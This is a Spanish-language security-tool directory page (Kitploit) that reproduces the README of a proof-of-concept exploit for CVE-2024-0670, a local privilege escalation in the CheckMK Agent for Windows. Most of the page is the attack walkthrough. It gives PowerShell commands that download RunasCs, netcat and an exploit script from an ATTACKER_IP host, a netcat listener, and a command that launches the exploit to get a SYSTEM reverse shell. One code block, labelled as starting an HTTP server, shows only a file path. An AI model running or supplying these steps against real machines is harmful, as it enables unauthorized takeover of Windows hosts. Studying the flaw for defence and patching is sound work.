Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2024-0670-CheckMK-Agent-Local-Privilege-Escalation-Exploit — Este repositorio contiene una demostración de explotación para CVE-2024-0670, una vulnerabilidad de escalada de privilegios local que afecta al CheckMK Agent para Windows. La vulnerabilidad permite que un usuario con pocos privilegios obtenga privilegios de SYSTEM abusando de rutas de archivos editables procesadas por el mecanismo de reparación de MSI. | Kitploit
Herramientas/GitHubGitHub/elsevar11/cve-2024-0670-checkmk-agent-local-privilege-escalation-exploit
Escalada de PrivilegiosGeneración de PayloadsAnálisis de VulnerabilidadesExplotaciónPruebas de PenetraciónAprendizaje y EducaciónExplotación de Binarios
GitHubelsevar11/cve-2024-0670-checkmk-agent-local-privilege-escalation-exploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →

CVE-2024-0670-CheckMK-Agent-Local-Privilege-Escalation-Exploit

Ver Repositorio
3hace 9 mesesAún no revisado

Acerca de

Este repositorio contiene una demostración de explotación para CVE-2024-0670, una vulnerabilidad de escalada de privilegios local que afecta al CheckMK Agent para Windows. La vulnerabilidad permite que un usuario con pocos privilegios obtenga privilegios de SYSTEM abusando de rutas de archivos editables procesadas por el mecanismo de reparación de MSI.

Compartir

CVE-2024-0670 – Escalada de Privilegios Local del Agente CheckMK (PoC)

Este repositorio contiene una prueba de concepto simple y limpia para CVE-2024-0670, una vulnerabilidad de escalada de privilegios local en el Agente CheckMK para Windows. Un usuario con bajos privilegios puede obtener privilegios de SYSTEM abusando de rutas de archivos temporales escribibles ejecutadas durante la reparación de MSI.

🔍 Resumen de la Vulnerabilidad

  • Proveedor: Tribe29
  • CVE: CVE-2024-0670
  • Aviso: https://sec-consult.com/vulnerability-lab/advisory/local-privilege-escalation-via-writable-files-in-checkmk-agent/

Durante una reparación de MSI, CheckMK ejecuta archivos en:

root@kitploit:~
  C:\Windows\Temp\

Si un usuario normal puede colocar archivos allí con nombres predecibles, puede ejecutar comandos como NT AUTHORITY\SYSTEM.

Este exploit siembra múltiples nombres de archivos de payload y desencadena la reparación de MSI para lograr ejecución como SYSTEM.

📂 Archivos

root@kitploit:~
RunasCs.exe     → runas replacement (plaintext password support)
nc.exe          → Netcat (reverse shell)
exploit.ps1     → CVE-2024-0670 exploit script
README.md       → documentation

🛠 Requisitos

  • Usuario de Windows con bajos privilegios
  • PowerShell habilitado
  • Agente CheckMK para Windows instalado
  • Capacidad de descargar archivos
  • Python (para un servidor HTTP simple)
  • Listener de Netcat en la máquina atacante

📡 Iniciar Servidor HTTP

root@kitploit:~
  C:\Windows\Temp\

📥 Descargar Herramientas en el Objetivo

root@kitploit:~
Invoke-WebRequest -Uri "http://ATTACKER_IP:8000/RunasCs.exe" -OutFile "C:\Windows\Temp\RunasCs.exe"
Invoke-WebRequest -Uri "http://ATTACKER_IP:8000/nc.exe" -OutFile "C:\Windows\Temp\nc.exe"
Invoke-WebRequest -Uri "http://ATTACKER_IP:8000/exploit.ps1" -OutFile "C:\Windows\Temp\exploit.ps1

🚀 Ejecutar el Exploit

Inicie un listener en su máquina:

root@kitploit:~
nc -lvnp 1111
root@kitploit:~
.\RunasCs.exe username "password" "powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\Windows\Temp\exploit.ps1"

Si tiene éxito, recibirá una reverse shell como SYSTEM.

🔧 Compilar RunasCs Manualmente (Opcional)

root@kitploit:~
net4: 
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe -target:exe -optimize -out:RunasCs.exe RunasCs.cs 

net2: 
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe -target:exe -optimize -out:RunasCs_net2.exe RunasCs.cs

⚖️ Aviso Legal

Este proyecto es solo para fines educativos y de pruebas de penetración autorizadas. No lo utilice con fines ilegales. El autor no es responsable por el mal uso.

Descargar herramienta